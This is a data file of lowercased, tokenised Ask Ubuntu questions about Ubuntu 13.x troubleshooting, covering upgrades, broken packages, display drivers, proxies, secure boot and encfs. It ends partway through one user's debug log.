360806	no sound settings available in the settings manager window	last night i decided to upgrade my system to the latest version of xubuntu , 13.10 . the process went fine , but now i 'm facing this strange issue . there is no sound settings available in the settings manager window and the volume indicator looks like when the volume is muted , clicking the indicator being broken as well . the indicator looks like this : i tried to do a alsa force-reload followed by a restart of the computer , but did n't help . any thoughts ? l.e . after some digging i found out that the volume control exists , so this must be a volume indicator issue .
360808	strange language in the login screen for unity and gnome	i use my ubuntu system in the french language while i type with an english keyboard layout . to my surprise , my login screen ( dates and day etc ) contains text which looks like arabic ( it might be persian too , but i am not sure ) . i searched for arabic installation in the synaptic package list , but no there was no such package ! how did arabic happen to the french system ?
360810	removing broken packages on distro update ( 13.04 to 13.10 )	i 'm kinda new to linux . last night i tried upgrading from 13.04 to 13.10 but i got the `` could not calculate '' error . i read this question and found this error in the main log : dist-upgrade failed : 'e : unable to correct problems , you have held broken packages . ' and here 's a list of my broken packages : broken libwayland-client0 : amd64 conflicts on libwayland0 [ amd64 ] < 1.0.5-0ubuntu1 > ( libs ) ( < 1.1.0 ) broken libpam-systemd : amd64 conflicts on libpam-xdg-support [ amd64 ] < 0.2-0ubuntu2 > ( admin ) broken cups-filters : amd64 conflicts on ghostscript-cups [ amd64 ] < 9.07~dfsg2-0ubuntu3.1 > ( text ) broken libharfbuzz0a : amd64 breaks on libharfbuzz0 [ amd64 ] < 0.9.13-1 > ( libs ) broken libunity-scopes-json-def-desktop : amd64 conflicts on libunity-common [ amd64 ] < 6.90.2daily13.04.05-0ubuntu1 > ( gnome ) ( < 7.0.7 ) broken libunity-scopes-json-def-desktop : amd64 conflicts on libunity-common [ i386 ] < none > ( none ) ( < 7.0.7 ) broken libaccount-plugin-generic-oauth : amd64 conflicts on account-plugin-generic-oauth [ amd64 ] < 0.10bzr13.03.26-0ubuntu1.1 > ( gnome ) ( < 0.10bzr13.04.30 ) broken libaccount-plugin-generic-oauth : amd64 breaks on account-plugin-generic-oauth [ amd64 ] < 0.10bzr13.03.26-0ubuntu1.1 > ( gnome ) ( < 0.10bzr13.04.30 ) broken python3-aptdaemon.pkcompat : amd64 breaks on libpackagekit-glib2-14 [ amd64 ] < 0.7.6-3ubuntu1 > ( libs ) ( < = 0.7.6-4 ) broken libsnmp-base : amd64 breaks on libsnmp15 [ amd64 ] < 5.4.3~dfsg-2.7ubuntu1 > ( libs ) ( < 5.7.2~dfsg-5 ) broken libunity-core-6.0-8 : amd64 conflicts on unity-common [ amd64 ] < 7.0.0daily13.06.19~13.04-0ubuntu1 > ( gnome ) broken python3-uno : amd64 conflicts on python-uno [ amd64 ] < 1:4.0.4-0ubuntu1 > ( python ) broken unity-scope-home : amd64 conflicts on unity-lens-shopping [ amd64 ] < 6.8.0daily13.03.04-0ubuntu1 > ( gnome ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken usb-modeswitch-data : amd64 breaks on usb-modeswitch [ amd64 ] < 1.2.3+repack0-1ubuntu3 > ( comm ) ( < 1.2.6 ) broken unity-gtk2-module : amd64 conflicts on appmenu-gtk [ amd64 ] < 12.10.3daily13.04.03-0ubuntu1 > ( libs ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken unity-gtk3-module : amd64 conflicts on appmenu-gtk3 [ amd64 ] < 12.10.3daily13.04.03-0ubuntu1 > ( libs ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken libbamf3-1 : amd64 depends on bamfdaemon [ amd64 ] < 0.4.0daily13.06.19~13.04-0ubuntu1 - > 0.5.1+13.10.20131011-0ubuntu1 > ( libs ) ( = 0.4.0daily13.06.19~13.04-0ubuntu1 ) broken bzr-gtk : amd64 depends on bzr [ amd64 ] < 2.6.0~bzr6571-4ubuntu2 - > 2.6.0-3ubuntu1 > ( devel ) ( < 2.6.0 ) broken libgphoto2-6-dev : amd64 conflicts on libgphoto2-2-dev [ amd64 ] < 2.4.14-2 > ( libdevel ) broken activity-log-manager : amd64 conflicts on activity-log-manager-common [ amd64 ] < 0.9.4-0ubuntu6.2 > ( utils ) broken libgjs0d : amd64 conflicts on libgjs0c [ amd64 ] < 1.34.0-0ubuntu1 > ( libs ) broken libgtksourceview-3.0-0 : amd64 depends on libgtksourceview-3.0-common [ amd64 ] < 3.6.3-0ubuntu1 - > 3.8.2-0ubuntu1 > ( libs ) ( < 3.7 ) broken gnome-pie : amd64 depends on libbamf3-1 [ amd64 ] < 0.4.0daily13.06.19~13.04-0ubuntu1 > ( libs ) broken libunity-core-6.0-5 : amd64 depends on unity-services [ amd64 ] < 7.0.0daily13.06.19~13.04-0ubuntu1 - > 7.1.2+13.10.20131014.1-0ubuntu1 > ( gnome ) ( = 7.0.0daily13.06.19~13.04-0ubuntu1 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken libxi6 : amd64 breaks on xserver-xorg-core [ amd64 ] < 2:1.13.4~git20130508+server-1.13-branch.10c42f57-0ubuntu0ricotz~raring - > 2:1.14.3-3ubuntu2 > ( x11 ) ( < 2:1.14 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.1.99+git20130730.6a278369-0ubuntu0sarvatt~raring - > 1:7.2.0-0ubuntu10 > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.1.99+git20130730.6a278369-0ubuntu0sarvatt~raring - > 1:7.2.0-0ubuntu10 > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) thats a lot of stuff ... do i have to remove them one by one ? will removing them cause any issue ? do i have to install them one by one again after the upgrade ? edit : apparently it has something to do with amd proprietary binaries ... i think
360811	nautilus tree view	where is the nautilus tree view ? list view is just not the same as tree view , so please help me to find the tree view option in nautilus .
360814	cursor disappearing in a ideapad yoga ?	upgraded from 13.04 to 13.10 on my ideapad yoga yesterday , hoping it might have fixes for a couple of issues i 've been having . while it seems to have made the touchscreen more usable , it has made the problem with my trackpad even worse . in 13.04 and below , the cursor occasionally ( maybe once or twice a day ) would completely stop working and to get it working again i would run sudo modprobe -r psmouse sudo modprobe psmouse and it would be happy again , now every hour or so , my cursor just goes invisible , you can tell its still there as you can hover over things and they will respond . again running sudo modprobe -r psmouse sudo modprobe psmouse works but it 's getting a little annoying now its so frequent ! does anyone have any suggestions on things to try ?
360817	upgraded to 13.10 , screen regularly flashes between red , green , blue , greys after boot . no x11 or unity	i have a z77 board with a geforce gtx 670 . my monitor is a korean 27 '' ips with only a single dvi dual-link connection , and a resolution of 2560x1440 . after upgrading to 13.10 today , unity and the x window system are non-functional . after booting up , all i see is a screen that flashes between red , green , blue , various blacks , greys , and whites at regular intervals . from here i can switch to command line , and that displays fine , but starting lightdm takes me back to the flashing colors . i had this problem on 13.04 , but i was able to fix it by editing xorg.conf with the proper information about my monitor . no such luck for 13.10 . i have tried : installing different drivers ( i.e . nvidia-current , nvidia-experimental ) plugging into both dvi ports on my 670 editing xorg.conf myself letting the nvidia package do the xorg.conf configuration automatically admittedly i know very little about x window system , and all my editing was based on xorg.conf files posted by others that were claimed to work , none of which used the same combination of monitor and video card as mine . i 'm out of ideas at this point , input from someone who knows what they 're doing would be greatly appreciated .
360818	ubuntu 12.04 login problems after uninstalling some programs through software center	at start up on entering password , it says sorry no ubuntu . there are three options at the login recovery console , ubuntu 2d and user defined login . when i go to ubuntu 2d it says ubuntu 2d not available . i can go to the recovery console , but after trying apt-get install , reinstall , apt-get , configure etc . when i exit it again comes to login screen so basically i am now toggling between login screen and recovery console . i have already run through the recovery mode at boot did the repair clean and all options in the recovery mode . still this is the continuing situation . can somebody guide me please ? i am relatively new to ubuntu but am interested in using it .
360820	ca n't install bumblebee on ubuntu 13.10	i have a newly installed ubuntu 13.10 , and i have followed instructions from https : //wiki.ubuntu.com/bumblebee . the first two steps are : ( not needed for 13.10 saucy and newer ) sudo add-apt-repository ppa : bumblebee/stable enable the universe and multiverse repositories ( for bumblebee and nvidia packages respectively ) . these two steps are ok . but the third step is : sudo apt-get update after invoke this command , here is the result : w : can not dowload http : //ppa.launchpad.net/bumblebee/stable/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . also , the forth step is : sudo apt-get install bumblebee virtualgl linux-headers-generic there is no virtualgl on ubuntu 13.10 . i think there is no bumblebee package for ubuntu 13.10 saucy .
360824	wireless mouse stops working , when in battery , for a couple of seconds now and then	i 'm using a logitech wireless mouse in ubuntu 13.10 and , when in battery , it stops working every now and then ! it works specially when i write something . right now , if i try to move my pointer ( using the mouse ) , it wo n't work . i need to wait a couple of seconds . ( the touchpad works fine ) any ideas ?
360825	what to install on a minimal installation to be able to install any desktop	could someone tell me which packages i have to install on a minimal ubuntu to be able to i stall any desktop like cinammon e 17 trinity or phanteon . thank you .
360826	clipboard manager saving source of clip ?	i have seen examples of clip-board managers in this forum and elsewhere too . however , i am not sure , if they offer a facility to save the source of the clip as well . for example , i may be reading a pdf file , a web page , code in terminal , browse a diagram on some web page , etc . when i copy or take a screen-shot , i want my clip-board to save the information of the source as well . so that , i can easily refer back from where the clip was taken . would you know of such an application ?
360830	how to configure isa proxy authentification ?	i 've installed ubuntu 13.04 . my problem is that i 'm inside the third level windows domain network ( stan.domainname.lan ) which is using isa proxy server . when i login into windows , i usually type domainname\username ( windows pc is connected to domain ) . my problem is in ubuntu i can use internet only from browser ( browser settings : proxy , port:8080 ) . i have the following configuration in /etc/apt/apt.conf : acquire : :http : :proxy `` http : //stan\username : password @ proxy:8080/ '' ; in the terminal i 'm getting this : archive.canonical.com/ubuntu/dists/raring/partner/binary-amd64/packages 407 proxy authentication required ( the isa server requires authorization to fulfill the request . access to the web proxy filter is denied. )
360831	downgrade to nautilus 3.4 from ubuntu 13.10 / nautilus 3.8	i just updated to ubuntu 13.10 and greatly dislike nautilus 3.8 that comes with it . in ubuntu 13.04 i used the instructions in this article to get back some of the features from nautilus 3.4 , but unfortunately that does n't work anymore . i particularly miss dividing up the window with f3 to have two folders show at the same time . the new search function i also find pretty terrible . i checked out nemo but i would much prefer downgrading to nautilus 3.4 .
360832	default username and password for ubuntu12.04 lts image	i have spawned an openstack instance using ubuntu 12.04 image that i got from http : //cloud-images.ubuntu.com/precise/current/precise-server-cloudimg-amd64-disk1.img . its now asking me for a username and password . i have n't set any username or password during the process . i have tried username to be `` ubuntu '' and password as bland and `` ubuntu '' . both dont seem to work . can someone please help me out ? its urgent .
360836	surface pro wo n't boot with secure boot enabled	i downloaded 13.10 today and installed it with secure boot set to off on my surface pro in a 10gb partition . i realized afterwards that for personal reasons i need secure boot enabled , so i re-enabled it - ubuntu wo n't boot anymore with a `` secure boot violation '' . i basically followed the install here on ask ubuntu . boot-repair claims to have fixed efi boot capabilities but basically changed nothing about the issue as i still ca n't boot . i also made sure to have shim , grub and the kernel in a signed version as suggested here : https : //bugs.launchpad.net/ubuntu/+source/grub-installer/+bug/1184297 . am i missing anything ? i tried inquiring about this in irc but was told secure boot would simply not work with ubuntu yet , which to my knowledge is not correct .
360841	monodevelop does n't find xsp4 web server although it is installed/running	i 'm running 13.04 32bit and installed monodevelop-latest ( keks9n-monodevelop-latest-raring.list repository , currently 4.1.7 ) and after getting my mvc4 application to build i wanted to run it ( right-click on subproject and `` run item '' ) but monodevelop does n't find the xsp4 webserver . i get the following error message : the xsp4 web server can not be found . please ensure that it is installed . but mono-xsp4 is installed and runs automatically or can be run manually ( sudo service mono-xsp4 start or just xsp4 ) however i had some problems getting mono-xsp4 to work ( i do n't know if this is related to the monodevelop problem so i describe it aswell ) . on apt-get install mono-xsp4 i got : binding mono xsp 4 address : 0.0.0.0 * you have an incomplete /etc/xsp4/debian.webapp * to fix it , you need to install at least one package for xsp4 ( like asp.net-examples ) installing asp.net-examples simply ( re- ) installs mono-xsp2 and i did n't find any asp.net4-examples package . thus mono-xsp4 would not still run . i realized there are no applications set in /etc/xsp4/debian.webapp ( empty except < apps > < /apps > ) and by simply copying /etc/xsp2/debian.webapp to /etc/xsp4/ i could start mono-xsp4 ( however , of course , there are no asp4 examples installed ) back to monodevelop : in monodevelop i set the ip and port correctly to the ip and port mono-xsp4 is using but still xsp4 is not found . whether mono-xsp4 is already running or i stopped it so monodevelop can start it itself , i always get the error message above . can somebody help me out ? is this a bug of monodevelop 4.1.7 ( i need version v4 otherwise the vs2012 solution wo n't open correctly ) or is something wrong with my mono-xsp4 install ? i would love to use the lastest monodevelop v4 stable version but i did n't find any ubuntu 13.04 repository for it .
360842	cant install ubuntu on acer predator g3100	i have a problem when i try to install ubuntu on my predator g3100.when i try to install it ubuntu dos n't find my hdd.i tried from usb and a disc but there isnt any diffirents . here is a screen shoot of the problem .
360845	problems installing 13.10 inside vmware player 4	in the past i had no problems installing ubuntu 12.04 inside vmware player 4.0.4 on my windows 7 pro machine . now i installed ubuntu 13.10 and have a couple of problems : the default screensize ( even during the installation ) is gigantic i 've told ubuntu to automatically login - after reboot the gigantic screen occurs without showing anything , without doing anything on mouse clicks , ctrl+alt+backspace does not work switching to console using ctrl+alt+f1 ... f6 works , but is incredible slow invoking 'sudo reboot now ' does not succeed , it prints killing all remining processes ... [ fail ] restoring resolver state ... [ ok ] will now switch to single-user mode root @ ubuntu1310 : ~ # invoking now 'shutdown now ' will soon show the same error . what i need to do to get ubuntu 13.10 up and running in vmware player ?
360846	when cinnamon is installed , unity desktop `` smears '' ( does n't refresh ) and shows no wallpaper	since a couple of days now , my unity desktop background smears everything , just like what old windows versions were famous for : of course , i tried rebooting a couple of times . also , i switched graphics driver and i tried to change wallpaper and theme , but none of them solved the problem . what could be causing that problem , and where can i search on for its source ? infomation update i 'm using ubuntu 13.04 ( not updated to 13.10 yet ) . the following commands were all run from cinnamon ( on the same ubuntu installation ) . sudo lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring sudo uname -a : linux cedric-macbookpro 3.8.0-32-generic # 47-ubuntu smp tue oct 1 22:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo dpkg -l | grep xserver-xorg-video : ii xserver-xorg-video-all 1:7.7+1ubuntu4 amd64 x.org x server -- output driver metapackage ii xserver-xorg-video-ati 1:7.1.0-0ubuntu2 amd64 x.org x server -- amd/ati display driver wrapper ii xserver-xorg-video-cirrus 1:1.5.2-0ubuntu1 amd64 x.org x server -- cirrus display driver ii xserver-xorg-video-fbdev 1:0.4.3-0ubuntu1 amd64 x.org x server -- fbdev display driver ii xserver-xorg-video-intel 2:2.21.6-0ubuntu4.3 amd64 x.org x server -- intel i8xx , i9xx display driver ii xserver-xorg-video-mach64 6.9.3-0ubuntu1 amd64 x.org x server -- ati mach64 display driver ii xservhttps : //bugs.launchpad.net/ubuntu/+source/unity/+bug/1244237er-xorg-video-mga 1:1.6.2-0ubuntu1 amd64 x.org x server -- mga display driver ii xserver-xorg-video-modesetting 0.7.0-0ubuntu2 amd64 x.org x server -- generic modesetting driver ii xserver-xorg-video-neomagic 1:1.2.7-0ubuntu1 amd64 x.org x server -- neomagic display driver ii xserver-xorg-video-nouveau 1:1.0.7-0ubuntu1 amd64 x.org x server -- nouveau display driver ii xserver-xorg-video-openchrome 1:0.3.1-0ubuntu1.13.04.1 amd64 x.org x server -- via display driver ii xserver-xorg-video-qxl 0.1.0-0ubuntu3 amd64 x.org x server -- qxl display driver ii xserver-xorg-video-r128 6.9.1-0ubuntu1 amd64 x.org x server -- ati r128 display driver ii xserver-xorg-video-radeon 1:7.1.0-0ubuntu2 amd64 x.org x server -- amd/ati radeon display driver ii xserver-xorg-video-s3 1:0.6.5-0ubuntu3 amd64 x.org x server -- legacy s3 display driver ii xserver-xorg-video-savage 1:2.3.6-0ubuntu1 amd64 x.org x server -- savage display driver ii xserver-xorg-video-siliconmotion 1:1.7.7-0ubuntu1 amd64 x.org x server -- siliconmotion display driver ii xserver-xorg-video-sis 1:0.10.7-0ubuntu1 amd64 x.org x server -- sis display driver ii xserver-xorg-video-sisusb 1:0.9.6-0ubuntu1 amd64 x.org x server -- sis usb display driver ii xserver-xorg-video-tdfx 1:1.4.5-0ubuntu1 amd64 x.org x server -- tdfx display driver ii xserver-xorg-video-trident 1:1.3.6-0ubuntu2 amd64 x.org x server -- trident display driver ii xserver-xorg-video-vesa 1:2.3.2-0ubuntu1 amd64 x.org x server -- vesa display driver ii xserver-xorg-video-vmware 1:12.0.2+git.e5ac80d8-0ubuntu1 amd64 x.org x server -- vmware display driver sudo lspci | grep vga : 01:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 330m ] ( rev a2 ) update 2 this bug might be related : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/1244237
360847	encfs error while decoding the data	i have installed encfs and started using it to secure all my personal & office data and it was working absolutely fine until 2 hours back . the setup is like this . i have a folder in copy folder called officedata which gets synchronized with my copy folder when i login into the system i use the command encfs ~/copy/officedata ~/documents/officedata once my work is over i dismount with the command fusermount -u ~/documents/officedata all this data get synchronized with my desktop and with my mobile phone ( as a backup ) today when i mounted , the folder got mounted by no directories and files present in that folder . i was worried and read man encfs which gave me to run the command encfs -v -f ~/copy/officedata ~/documents/officedata 2 > encfs-officedata-report.txt . the below is the output of the file encfs-officedata-report.txt . the directory `` /home/sri/documents/officedata '' does not exist . should it be created ? ( y , n ) 13:16:26 ( main.cpp:523 ) root directory : /home/sri/copy/officedata/ 13:16:26 ( main.cpp:524 ) fuse arguments : ( fg ) ( threaded ) ( keycheck ) encfs /home/sri/documents/officedata -f -s -o use_ino -o default_permissions 13:16:26 ( fileutils.cpp:177 ) version = 20 13:16:26 ( fileutils.cpp:181 ) found new serialization format 13:16:26 ( fileutils.cpp:199 ) subversion = 20100713 13:16:26 ( interface.cpp:165 ) checking if ssl/aes ( 3:0:2 ) implements ssl/aes ( 3:0:0 ) 13:16:26 ( ssl_cipher.cpp:370 ) allocated cipher ssl/aes , keysize 32 , ivlength 16 13:16:26 ( interface.cpp:165 ) checking if ssl/aes ( 3:0:2 ) implements ssl/aes ( 3:0:0 ) 13:16:26 ( ssl_cipher.cpp:370 ) allocated cipher ssl/aes , keysize 32 , ivlength 16 13:16:26 ( fileutils.cpp:1620 ) usestdin : 0 13:16:46 ( interface.cpp:165 ) checking if ssl/aes ( 3:0:2 ) implements ssl/aes ( 3:0:0 ) 13:16:46 ( ssl_cipher.cpp:370 ) allocated cipher ssl/aes , keysize 32 , ivlength 16 13:16:49 ( fileutils.cpp:1628 ) cipher key size = 52 13:16:49 ( interface.cpp:165 ) checking if nameio/block ( 3:0:1 ) implements nameio/block ( 3:0:0 ) 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/ 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/ 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn : no such file or directory 13:16:49 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 4188221457101129840 , fileiv = 0 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/uwbt-m-ukk1jpvnfn5uvohgn : no such file or directory 13:16:49 ( encfs.cpp:138 ) getattr error : no such file or directory 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf : no such file or directory 13:16:49 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 16725694203599486310 , fileiv = 0 13:16:49 ( dirnode.cpp:770 ) created filenode for /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf 13:16:49 ( encfs.cpp:134 ) getattr /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/o94olxb3orqarqyfvihkz , zf : no such file or directory 13:16:49 ( encfs.cpp:138 ) getattr error : no such file or directory 13:16:49 ( macfileio.cpp:75 ) fs block size = 1024 , macbytes = 8 , randbytes = 0 13:16:49 ( filenode.cpp:127 ) calling setiv on ( null ) 13:16:49 ( rawfileio.cpp:191 ) getattr error on /home/sri/copy/officedata/tvglci2rgp9o8qe-m9avx6jnj1lqs-er0ovnxfob30z,3 , : no such file or directory 13:16:49 ( cipherfileio.cpp:105 ) in setiv , current iv = 0 , new iv = 1354483141023495884 , fileiv 